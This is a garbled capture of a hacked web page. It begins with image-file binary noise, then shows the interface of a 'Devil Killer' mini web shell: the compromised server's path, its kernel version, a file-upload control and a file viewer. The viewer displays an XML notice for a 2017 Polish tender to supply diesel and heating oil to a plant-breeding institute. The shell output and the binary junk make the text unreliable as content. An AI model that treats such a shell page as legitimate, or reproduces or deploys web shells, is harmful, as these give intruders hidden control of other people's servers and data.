JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/frontend/runtime/temp/20170131/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/frontend/runtime/temp/20170131/16979_2017.xml

<?xml version="1.0" encoding="utf-8"?><ZP-400><biuletyn>2017</biuletyn><pozycja>16979</pozycja><data_publikacji>2017-01-31</data_publikacji><nazwa>Instytut Hodowli i Aklimatyzacji Roślin - Państwowy Instytut Badawczy Zakład Doświadczalny Radzików</nazwa><ulica>Radzików</ulica><nr_domu></nr_domu><nr_miesz></nr_miesz><miejscowosc>Błonie</miejscowosc><kod_poczt>05870 </kod_poczt><panstwo>Polska</panstwo><wojewodztwo>mazowieckie</wojewodztwo><tel>227 253 715</tel><fax>227 253 715</fax><email>m.kozlowski@zdhar.pl</email><internet></internet><adres_strony_internetowej_narzedzia></adres_strony_internetowej_narzedzia><adres_strony_url>www.zdhar.pl</adres_strony_url><podmiot2c></podmiot2c><regon>7948000040</regon><e_mail></e_mail><ogloszenie>Ogłoszenie o zamówieniu</ogloszenie><czy_obowiazkowa>T</czy_obowiazkowa><zamieszczanie_obowiazkowe>T</zamieszczanie_obowiazkowe><nazwa_projektu_programu></nazwa_projektu_programu><czy_ubiegac_zaklady_pracy /><minimalny_procent_zatrudnienia></minimalny_procent_zatrudnienia><czy_przeprowadza_centralny_zamawiajacy>T</czy_przeprowadza_centralny_zamawiajacy><czy_przeprowadza_podmiot_zamawiajacy_powierzyl /><zamawiajacy_powierzyl></zamawiajacy_powierzyl><czy_przeprowadza_wapolnie /><przeprowadza_wapolnie_podmiot1></przeprowadza_wapolnie_podmiot1><przeprowadza_wapolnie_podmiot2></przeprowadza_wapolnie_podmiot2><czy_przeprowadza_zamawiajacy_z_eu /><postepowanie_wspolne_tresc></postepowanie_wspolne_tresc><informacje_dodatkowe_zamawiajacy></informacje_dodatkowe_zamawiajacy><dotyczy>1</dotyczy><adres_dyn_zak></adres_dyn_zak><rodzaj_zam>inny: </rodzaj_zam><wspolne_udzielanie_zamowienia></wspolne_udzielanie_zamowienia><czy_dostep_dokumentow_zamowienia /><dostep_dokumentow_zamowienia></dostep_dokumentow_zamowienia><czy_zamieszczona_bedzie_specyfikacja>T</czy_zamieszczona_bedzie_specyfikacja><zamieszczona_bedzie_specyfikacja>www.zdhar.pl</zamieszczona_bedzie_specyfikacja><czy_dostep_do_dokumentow_ograniczony /><czy_wymagane_przeslanie_ofert>T</czy_wymagane_przeslanie_ofert><wymagane_przeslanie_ofert_inny>Bezpośrednio doręczyć do Zamawiającego zgodnie z informacjami zawartymi w SIWZ</wymagane_przeslanie_ofert_inny><czy_podzielone_na_czesci>N</czy_podzielone_na_czesci><oferty_lub_wnioski>Wszystkie</oferty_lub_wnioski><maksymalna_liczba_czesci></maksymalna_liczba_czesci><zastrezega_prawo_grup_czesci></zastrezega_prawo_grup_czesci><maksymalna_liczba_czesci_jednemu_wykonawcy></maksymalna_liczba_czesci_jednemu_wykonawcy><dostep_do_dokumentow_ograniczony></dostep_do_dokumentow_ograniczony><czy_oferty_wnioski_dostepne /><oferty_wnioski_dostepne></oferty_wnioski_dostepne><czy_dopuszczone_wymagane_przeslanie_ofert /><dopuszczone_wymagane_przeslanie_ofert_inny></dopuszczone_wymagane_przeslanie_ofert_inny><dopuszczone_wymagane_przeslanie_ofert_adres></dopuszczone_wymagane_przeslanie_ofert_adres><czy_komunikacja_elektroniczna_wymaga /><komunikacja_elektroniczna_wymaga></komunikacja_elektroniczna_wymaga><wymagania_dotyczace_rejestracji_wyk_aukcja></wymagania_dotyczace_rejestracji_wyk_aukcja><nazwa_zamowienia>Zakup i dostawa oleju napędowego i opałowego</nazwa_zamowienia><numer_referencyjny></numer_referencyjny><czy_dialog_techniczny /><rodz_zam>D</rodz_zam><przedmiot_zam>3. Opis przedmiotu zamówienia

Kod CPV: 09 13 41 00 – 8, 24 09 13 51 00 – 5;

3.1 Przedmiotem zamówienia jest zakup i dostawa oleju napędowego i opałowego w okresie od 20.02.2017 do 28.02.2018r. dla Instytutu Hodowli i Aklimatyzacji Roślin  Państwowego Instytutu Badawczego  Zakładu Doświadczalnego Radzików w ilości.
Lp	Nazwa i rodzaj paliwa	Ilość w litrach
1	2	3
1.
2.	             Olej napędowy
             Olej opałowy	145.000
  22.000





Uwaga:
Zamawiający zastrzega sobie prawo ilościowych zmian przedmiotu zamówienia w okresie obowiązywania umowy,

3.2 Ustalenia dotyczące przedmiotu zamówienia:
a)	Zamawiający nie dopuszcza składania ofert wariantowych,
b)	Zamawiający nie dopuszcza składania ofert częściowych,
c)	Zamawiający nie przewiduje możliwości udzielenia zamówień uzupełniających,
d)	Przedmiotem niniejszego postępowania nie jest zawarcie umowy ramowej,
e)	Zamawiający wymaga od Wykonawcy samodzielnego wykonania zamówienia.

3.3 Inne wymagania dotyczące przedmiotu zamówienia określone przez Zamawiającego:
3.3.1 Kod klasyfikacji Wspólnego słownika Zamówień – CPV: 09 13 41 00 8 - olej napędowy, 
               09 13 51 00 5 - olej opałowy,
3.3.2 Wykonawca jest odpowiedzialny za jakość, zgodność rodzajową i ilościową, 
3.3.3 Wykonawca jest odpowiedzialny za całokształt realizacji zamówienia, w tym: za przebieg i terminową   dostawę, za szkody wyrządzone w przypadku dostarczenia nieodpowiedniego oleju, za straty powstałe z winy Wykonawcy - do czasu wygaśnięcia zobowiązań Wykonawcy wobec Zamawiającego. 

3.4 Informacje dotyczące realizacji zamówienia: 
      Przedmiotem zamówienia są:
a)	Olej napędowy w ilości razem - 145 000 l. 
Przedmiotem zamówienia są sukcesywne dostawy oleju napędowego w łącznej ilości 145 000 litrów na okres jednego roku, w zależności od pory roku (olej letni/olej zimowy) na potrzeby Zakładu Doświadczalnego w Radzikowie. Dostawy będą realizowane na podstawie zamówienia telefonicznego lub e-mailem, do zbiornika paliwa, znajdującego się na terenie siedziby Zamawiającego. Wykonawca jest zobowiązany dostarczyć olej napędowy własnym transportem i na własny koszt w terminie od 48 do 72 godzin od otrzymania zamówienia do zbiornika w/w instytucji .
Każdorazowa dostawa paliwa po 10 000 l. musi być potwierdzona certyfikatem jakości potwierdzającym wymagania jakościowe, zgodne z Polską Normą (PN) o parametrach nie gorszych niż według Polskiej Normy PN-EN 590:2013-12 dla oleju napędowego oraz wymagania określone w Rozporządzeniu Ministra Gospodarki w sprawie wymagań jakościowych dla paliw ciekłych. Wykonawca zobowiązany jest przy każdej dostawie na swój koszt zapewnić specjalną plastikową butelkę z szerokim wlewem i specjalną plombą numeryczną o poj. 1 000 ml, w której przechowywana będzie próbka dostarczonego paliwa. Pobranie próbki paliwa i oplombowanie butelki nastąpi w obecności pracownika Zakładu Doświadczalnego. Pobrana próbka paliwa pozostawiona zostanie w siedzibie Zamawiającego do czasu kolejnej dostawy. Przyjęcie dostarczanego paliwa odbywać się będzie w litrach w temperaturze referencyjnej 15° C. Zamówione paliwo przeznaczone będzie na potrzeby eksploatacyjne pojazdów, zamawiającego w terminach i ilości  zależnych od bieżących potrzeb Zamawiającego.
Zamawiający zastrzega, iż łączna ilość zamówienia w czasie trwania umowy może ulec zmianie +/- 10%:
-	w przypadku mniejszych ilości dostarczonego oleju napędowego Wykonawcy nie będzie przysługiwać z tego tytułu żadne roszczenie (odszkodowanie).
-	w przypadku większego zapotrzebowania na paliwo  (max.10%) cena nie ulegnie zmianie w stosunku ceny podanej na formularzu ofertowym.
Zamawiający wymaga, aby urządzenia do pomiaru przetłaczanego paliwa posiadały stosowne               certyfikaty, atesty lub inne ważne dokumenty potwierdzające prawidłową ilość przetłoczonego paliwa z cysterny Dostawcy do zbiorników Odbiorcy.
Dostawa i ilości przybliżone na adresy jak niżej: 
-	Instytut Hodowli i Aklimatyzacji Roślin –Państwowy Instytut Badawczy Zakład Doświadczalny Radzików, 05-870 Błonie, około 95 000 litrów 
-	Instytut Hodowli i Aklimatyzacji Roślin – Państwowy Instytut Badawczy Zakład Doświadczalny Radzików Gospodarstwo Młochów, ul. Platanowa 19, 05-831 Młochów, około 50 000 litrów 
b)	 Olej opałowy w ilości razem - 22 000 l.: 
Zakres przedmiotu zamówienia obejmuje dostawy oleju opałowego dla Instytutu Hodowli i Aklimatyzacji Roślin – Państwowego Instytutu Badawczego Zakład Doświadczalny Radzików Gospodarstwo Młochów, ul. Platanowa 19, 05-831 Młochów. Każdorazowa dostawa po 1000 l. - 4000 l. Olej kwalifikowany na podstawie Polskiej Normy, posiadający certyfikat dopuszczenia do obrotu. Każdorazowa dostawa potwierdzona świadectwem jakości dostawy. 
Olej opałowy dostarczany będzie w jakości odpowiadającej obowiązującym normom  wraz z certyfikatem jakości. W przypadku dostarczenia oleju opałowego bez certyfikatu zamówiony olej może być przez Zamawiającego nie przyjęty. Dostarczona ilość oleju opałowego fakturowana będzie w temperaturze rzeczywistej. W cenie jednostkowej oleju opałowego należy uwzględnić koszty transportu. Wykonawca realizować będzie dostawy w czasie od 48 do 72 godzin od złożenia zamówienia telefonicznie, potwierdzonego faxem.

3.5 Wymagania dotyczące gwarancji i reklamacji: 
3.5.1 Wykonawca obejmuje gwarancją całość przedmiotu umowy na okres 12 miesięcy. Przez całość   przedmiotu umowy Zamawiający rozumie wszelkie wykonane dostawy związane z realizacją zamówienia. Termin obowiązywania gwarancji liczony będzie od daty odbioru. 
3.5.2 Reklamacje dotyczące stwierdzonych wad dostarczonego oleju załatwiane będą z należytą starannością, rozumianą jako staranność profesjonalisty w działalności objętej przedmiotem niniejszego zamówienia, w terminie do 3 dni, licząc od dnia zgłoszenia. 
3.6 Pozostałe informacje: 
3.6.1 Płatność za dostawy oleju napędowego i opałowego będą wykonywane przelewem po otrzymaniu przedmiotu   zamówienia i prawidłowo wystawionej przez Wykonawcę faktury VAT. 
3.6.2 Dokumenty dostawy muszą zawierać: nazwę marki i numer rejestracyjny pojazdu, o których mowa w (załączniku nr 8), imienny wykaz osób - uprawnionych do tankowania kierowców, który stanowi (załącznik nr 7) do oferty i umowy. 
3.6.3 Płatność za paliwo odebrane w systemie bezgotówkowym, realizowana będzie przelewem na rachunek wskazany przez dostawcę w terminie 21 dni od daty otrzymania oleju i prawidłowo wystawionej faktury VAT. 
3.6.4 Obowiązkiem Dostawcy jest każdorazowe załączenie do faktury wykazu zawierającego dane dotyczące: marki i nr rejestracyjnego pojazdu pobierającego paliwo, nazwiska kierowcy dokonującego zakupu, daty poboru paliwa, rodzaj i ilość pobranego paliwa, ceny jednostkowe za litr. 
3.6.5 Dostawca odpowiedzialny jest za umożliwienie realizacji dostaw w systemie ciągłym przez okres obowiązywania umowy tj. od dnia 20.02.2017 r. do dnia 28.02.2018 r. w godzinach od 7:00 do 14:00 w dni robocze. 
3.6.6 Paliwo przyjmowane będzie w ilościach rzeczywistych, natomiast zapłata nastąpi za ilości przeliczone w temperaturze referencyjnej 15oC. W czasie dostawy Dostawca powinien dostarczyć fakturę lub dowód wydania, na których to dokumentach powinna być podana: ilość rzeczywista wg nalewu oraz ilość w temperaturze referencyjnej 15oC. Faktura powinna być wystawiona wg ilości odebranej i potwierdzonej przez Zamawiającego, wskazanej w dowodzie nalewu i przeliczonej na ilość w temperaturze referencyjnej 15oC.
3.6.7 Zamawiający przewiduje możliwość zgłoszenia kolejnego zapotrzebowania na olej napędowy lub opałowy przed upływem terminu płatności faktury za wcześniejszą dostawę. W przypadku dostarczenia oleju dla ZD Radzików i wystawienia faktury z terminem płatności 21 dni Zamawiający ma prawo przed dokonaniem zapłaty za wcześniej dostarczony olej złożyć kolejne zamówienie a Wykonawca zgodnie z terminem opisanym w SIWZ zobowiązany jest go dostarczyć.   

4. Termin i miejsce wykonania zamówienia.
4.1 Termin wykonania zamówienia – od dnia podpisania umowy do 28.02.2018r. 
4.2 Realizacja jednostkowego zamówienia od daty zgłoszenia:
a)	max 72 godziny – olej napędowy;
b)	max -72 godziny – olej opałowy; 
4.3 Dostawa oleju odbywać się będzie na podstawie zamówień przesyłanych e-mail, telefonicznie lub faksem, składanych sukcesywnie wg zapotrzebowania w okresie trwania umowy.
</przedmiot_zam><cpv1c>09134100-8</cpv1c><cpv2c>09135100-5</cpv2c><okres2c>20/02/201728/02/2018</okres2c><szacunkowa_wart_zam_calosc></szacunkowa_wart_zam_calosc><waluta_calosc></waluta_calosc><czy_przewiduje_udzielenie_zamowien_67>N</czy_przewiduje_udzielenie_zamowien_67><czy_przewiduje_udzielenie_zamowien_67_tekst></czy_przewiduje_udzielenie_zamowien_67_tekst><czy_czesci /><czy_czesci_wymaga /><ilosc_czesci></ilosc_czesci><ilosc_czesci_max></ilosc_czesci_max><czy_wariant /><czy_uzup /><zam_uzupelniajace></zam_uzupelniajace><czas>
        O
      </czas><czas_dni></czas_dni><czas_mies></czas_mies><data_roz></data_roz><data_zak></data_zak><ii_2_lub_temp></ii_2_lub_temp><informacje_na_temat_katalogow></informacje_na_temat_katalogow><okreslenie_warunkow>a)	kompetencji  lub uprawnień do prowadzenia określonej działalności zawodowej lub czynności (posiadania koncesji, zezwolenia lub licencji) jeżeli przepisy prawa nakładają taki obowiązek. W przypadku obowiązku wynikających z przepisów – czas na jaki udzielono koncesji nie może być krótszy niż określony okres realizacji przedmiotowego zamówienia. </okreslenie_warunkow><informacje_dodatkowe_okreslenie_warunkow></informacje_dodatkowe_okreslenie_warunkow><sytuacja_finansowa_okreslenie_warunkow>Informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej o posiadanych środkach finansowych lub zdolności kredytowej,  w wysokości 100.000,00 zł. (słownie: sto tysięcy złotych), wystawionej nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.  Firma składająca ofertę w zamian za informację bankową może przedłożyć informacje finansową – kompletny bilans za rok 2016,  jeżeli firma nie sporządza bilansu przedkłada informację finansową zgodnie z załącznikiem nr 9 do SIWZ.</sytuacja_finansowa_okreslenie_warunkow><sytuacja_finansowa_informacje_dodatkowe></sytuacja_finansowa_informacje_dodatkowe><zdolnosc_techniczna_okreslenie_warunkow>-	Posiadają niezbędną wiedzę i doświadczenie:
Zamawiający uzna warunek za spełniony, jeśli Wykonawca wykaże i udokumentuje ( referencje), że wykonał należycie w okresie ostatnich trzech lat przed upływem terminu  składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, zrealizował co najmniej: - trzy dostawy odpowiadające swoim zakresem rodzajem przedmiot zamówienia i o wartości nie mniejszej niż 200.000,00 zł. brutto (słownie: dwieście pięćdziesiąt tysięcy złotych). Ocena spełnienia warunku nastąpi na podstawie oświadczenia wskazanego a pkt. 6.2, oraz dokumentów, o których mowa w pkt. 6.3.1.b.
-	Dysponują odpowiednim potencjałem technicznym i osobami zdolnymi do wykonania zamówienia. Ocena spełnienia warunku nastąpi na podstawie dokumentów, o których mowa w pkt. 6.3.1.c i 6.3.1.d.
</zdolnosc_techniczna_okreslenie_warunkow><zdolnosc_techniczna_informacje_dodatkowe></zdolnosc_techniczna_informacje_dodatkowe><czy_zdolnosc_techniczna_wymaga_wykonawcow>T</czy_zdolnosc_techniczna_wymaga_wykonawcow><czy_zamawiajacy_przewiduje_wykluczenie>T</czy_zamawiajacy_przewiduje_wykluczenie><art_24_ust_5_pkt_1>T</art_24_ust_5_pkt_1><art_24_ust_5_pkt_2>T</art_24_ust_5_pkt_2><art_24_ust_5_pkt_3>T</art_24_ust_5_pkt_3><art_24_ust_5_pkt_4>T</art_24_ust_5_pkt_4><art_24_ust_5_pkt_5>T</art_24_ust_5_pkt_5><art_24_ust_5_pkt_6>T</art_24_ust_5_pkt_6><art_24_ust_5_pkt_7>T</art_24_ust_5_pkt_7><art_24_ust_5_pkt_8>T</art_24_ust_5_pkt_8><czy_oswiadczenie_niepodleganiu_wykluczenia>T</czy_oswiadczenie_niepodleganiu_wykluczenia><czy_oswiadczenie_spelnienie_kryteriow /><zaliczka /><uprawnienie></uprawnienie><wiedza></wiedza><potencjal></potencjal><zdolne></zdolne><sytuacja></sytuacja><sprawozdanie_calosc></sprawozdanie_calosc><lata_obrotowe></lata_obrotowe><oswiadczenie_potwierdzenia_1 /><oswiadczenie_potwierdzenia_2 /><oswiadczenie_potwierdzenia_3 /><oswiadczenie_potwierdzenia_4 /><oswiadczenie_potwierdzenia_5 /><oswiadczenie_potwierdzenia_6 /><oswiadczenie_potwierdzenia_7 /><oswiadczenie_potwierdzenia_8 /><oswiadczenie_potwierdzenia_9 /><oswiadczenie_potwierdzenia_10 /><oswiadczenie_wykluczenia_1 /><oswiadczenie_wykluczenia_2 /><oswiadczenie_wykluczenia_3 /><oswiadczenie_wykluczenia_4 /><oswiadczenie_wykluczenia_5 /><oswiadczenie_wykluczenia_6 /><oswiadczenie_wykluczenia_7 /><dok_podm_zag_1 /><dok_podm_zag_2 /><dok_podm_zag_3 /><dok_podm_zag_4 /><dok_potw_1 /><dok_potw_2 /><dok_potw_3 /><dok_potw_4 /><dok_potw_5 /><dok_potw_6 /><inne_dok_potw></inne_dok_potw><inne_dokumenty></inne_dokumenty><niepelnosprawne /><oswiadczenie_przedlozyc /><inne_dokumenty></inne_dokumenty><wykaz_dokumentow_zaswiadczen>6.3.2	W celu wykazania spełnienia warunku w postępowaniu dotyczącego braku podstaw do wykluczenia z postępowania o udzielenia zamówienia Wykonawcy w okolicznościach, o których mowa w art.24 Pzp. muszą złożyć następujące dokumenty:
a)	aktualnego odpisu z właściwego rejestru lub z Centralnej Ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji w celu wykazania braku podstaw do wykluczenia na podstawie art. 24 ust. 5 pkt 1 ustawy wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania oferty, 
b)	aktualnego zaświadczenia właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzającego, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczenia, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawionego nie wcześniej niż 3 miesiące przed upływem terminu składania oferty, 
c)	aktualnego zaświadczenia właściwego Naczelnika Urzędu Skarbowego potwierdzającego, że wykonawca nie zalega z opłacaniem podatków i opłat lub zaświadczenia, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawionego nie wcześniej niż 3 miesiące przed upływem terminu składania oferty,
d)	aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt. 13, 14 i 21 ustawy oraz, odnośnie skazania z wykroczenie na karę aresztu w zakresie określonym przez Zamawiającego na podstawie art.24 ust.5 pkt 5 i 6 ustawy, wystawionej nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert,
e)	oświadczenia wykonawcy o braku orzeczenia wobec niego tytułem środka zapobiegawczego zakazu ubiegania się o zamówienia publiczne,
f)	oświadczenia wykonawcy o przynależności albo braku przynależności do tej samej grupy kapitałowej; w przypadku przynależności do tej samej grupy kapitałowej wykonawca może złożyć wraz z oświadczeniem dokumenty bądź informacje potwierdzające, że powiązania z innym wykonawcą nie prowadzą do zakłócenia konkurencji w postępowaniu. 
</wykaz_dokumentow_zaswiadczen><zakresie_warunkow_udzialu>6.3.1	W celu potwierdzenia spełnienia warunków udziału w postępowaniu do oferty należy dołączyć:
a)	aktualnej koncesji na obrót paliwami ciekłymi zgodnie z przepisami ustawy Prawo energetyczne.
b)	w celu potwierdzenia opisanego przez zamawiającego warunku posiadania przez wykonawcę niezbędnej zdolności technicznej lub zawodowej, zamawiający żąda wykazu i udokumentowania (referencje) wykonanych min. trzech dostaw z ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem przedmiot zamówienia, z podaniem ich wartości oraz daty i miejsca wykonania wraz z załączeniem dowodów potwierdzających, że usługi te zostały wykonane należycie - wg wzoru stanowiącego (załącznik nr 6), Zamawiający przy ocenie spełnienia warunku będzie brał pod uwagę tylko i wyłącznie dostawy które polegały na dostarczeniu oleju napędowego i opałowego zawartych w jednej umowie. 
c)	wykaz osób, które będą uczestniczyć przy realizacji zamówienia w szczególności odpowiedzialnych za: kierowanie dostawami, transportem wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i uprawnień niezbędnych do wykonania zamówienia – jeżeli ustawa nakłada obowiązek posiadania takich uprawnień (załącznik nr 7), 
d)	dysponują sprzętem niezbędnym do realizacji zamówienia tj. autocysternami z liczydłami zalewu aktualnie certyfikowanymi (załącznik nr 8),
e)	zamawiający żąda od Wykonawcy dołączenia w oświadczeniach (załącznik nr 2 i 3) informacji o niezbędnych zasobach „innych podmiotów”, które  zostaną oddane do dyspozycji Wykonawcy przez podmiot trzeci na okres wykonania przedmiotu zamówienia lub jego części. Informacje zawarte w oświadczeniu stanowią wstępne potwierdzenie, że wykonawca nie podlega wykluczeniu oraz spełnia warunki udziału w postępowaniu a także spełnia kryteria selekcji. 
Zgodnie z art.26 ust.2 zamawiający może wezwać wykonawcę, którego oferta została najwyżej oceniona, do złożenia oświadczeń lub dokumentów potwierdzających okoliczności, o których mowa w art.25 ust.1. 
f)	akceptacja wzoru umowy - parafowanie przez Wykonawcę  umowy z wykorzystaniem (załącznika nr 5).
g)	informację o sytuacji finansowo ekonomicznej firmy (bilans) (załącznik nr 9).
</zakresie_warunkow_udzialu><zakresie_kryteriow_selekcji></zakresie_kryteriow_selekcji><inne_dokumenty_niewymienione>6.3.3	Dodatkowe dokumenty, które należy dołączyć do oferty:
a)	Wypełniony i podpisany Formularz ofertowy z wykorzystaniem wzoru (załącznik nr 1),
b)	Pełnomocnictwo do podpisania oferty, jeżeli osobą podpisującą nie jest osoba upoważnioną na podstawie dokumentu rejestrowego – w oryginale lub poświadczone notarialnie.
c)	ZOBOWIĄZANIE do oddania do dyspozycji Wykonawcy niezbędnych zasobów na okres
      korzystania z nich przy wykonywaniu zamówienia (załącznik nr 11),

6.4	Zgodnie z art. 24 ust.11 Wykonawca w terminie 3 dni od dnia zamieszczenia na stronie internetowej informacji, o której mowa w art.86 ust.5 ustawy, przekaże zamawiającemu oświadczenie o przynależności lub braku przynależności do tej samej grupy kapitałowej, o której mowa w art.24 ust.1 pkt.23 ustawy wg wzoru stanowiącego (załącznik nr 4).
</inne_dokumenty_niewymienione><wykaz_potwierdzenie_okolicznosci>b)	w celu potwierdzenia opisanego przez zamawiającego warunku posiadania przez wykonawcę niezbędnej zdolności technicznej lub zawodowej, zamawiający żąda wykazu i udokumentowania (referencje) wykonanych min. trzech dostaw z ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem przedmiot zamówienia, z podaniem ich wartości oraz daty i miejsca wykonania wraz z załączeniem dowodów potwierdzających, że usługi te zostały wykonane należycie - wg wzoru stanowiącego (załącznik nr 6), Zamawiający przy ocenie spełnienia warunku będzie brał pod uwagę tylko i wyłącznie dostawy które polegały na dostarczeniu oleju napędowego i opałowego zawartych w jednej umowie. </wykaz_potwierdzenie_okolicznosci><wadium>8. Wymagania dotyczące wadium.
8.1	Zamawiający wymaga wniesienia wadium w wysokości: 12.000,00 zł (słownie: dwanaście tysięcy złotych). Wadium w pieniądzu wnosi się przed upływem terminu składania ofert; 
8.2	Wadium może być wnoszone w jednej lub kilku następujących formach:   
a)	pieniądzu;  
b)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym, że poręczenie kasy jest zawsze poręczeniem pieniężnym; 
c)	gwarancjach bankowych;  
d)	gwarancjach ubezpieczeniowych;  
e)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2007 r. Nr 42, poz. 275). 
8.3	Wadium wniesione w pieniądzu Zamawiający przechowuje na rachunku bankowym.
